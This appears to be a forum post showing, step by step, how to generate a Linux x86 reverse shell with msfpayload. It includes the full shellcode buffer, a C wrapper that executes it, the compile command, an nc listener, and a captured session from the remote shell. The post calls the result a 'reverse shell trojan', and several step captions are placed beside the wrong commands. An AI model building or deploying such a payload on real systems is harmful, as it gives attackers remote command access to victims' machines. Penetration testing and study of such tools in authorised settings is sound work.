msfpayload/msfencode
If your aim is to create a Linux reverse shell binary you can try the following
Then take the C buffer and put it into a c program as followsCode:itsecurity@ptlaptop01:~$ /pentest/exploits/framework3/msfpayload linux/x86/shell_reverse_tcp LPORT=1050 LHOST=192.168.0.10 C /* * linux/x86/shell_reverse_tcp - 71 bytes * http://www.metasploit.com * LHOST=192.168.0.10, AppendExit=false, * PrependSetresuid=false, PrependSetuid=false, LPORT=1050, * PrependSetreuid=false */ unsigned char buf[] = "\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80" "\x5b\x5e\x68\xc0\xa8\x00\x0a\x66\x68\x04\x1a\x66\x53\x6a\x10" "\x51\x50\x89\xe1\x43\x6a\x66\x58\xcd\x80\x59\x87\xd9\xb0\x3f" "\xcd\x80\x49\x79\xf9\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69" "\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80";
Compile:Code:itsecurity@ptlaptop01:~$ cat revbind.c char code[] = "\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80" "\x5b\x5e\x68\xc0\xa8\x00\x0a\x66\x68\x04\x1a\x66\x53\x6a\x10" "\x51\x50\x89\xe1\x43\x6a\x66\x58\xcd\x80\x59\x87\xd9\xb0\x3f" "\xcd\x80\x49\x79\xf9\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69" "\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"; int main(int argc, char **argv) { int (*funct)(); funct = (int (*)()) code; (int)(*funct)(); }
Run listener on 192.168.0.10:Code:itsecurity@ptlaptop01:~$ gcc revbind.c -o revbind
Run reverse shell trojan:Code:itsecurity@ptlaptop01:~$ nc -nvvlp 1050 listening on [any] 1050 ...
Go back to listener on 192.168.0.10 and try a few commands:Code:itsecurity@ptlaptop01:~$ ./revbind
Code:itsecurity@ptlaptop01:~$ nc -nvvlp 1050 listening on [any] 1050 ... connect to [192.168.0.10] from (UNKNOWN) [192.168.0.10] 47665 pwd /home/itsecurity hostname ptlaptop01
Originally Posted by spawn
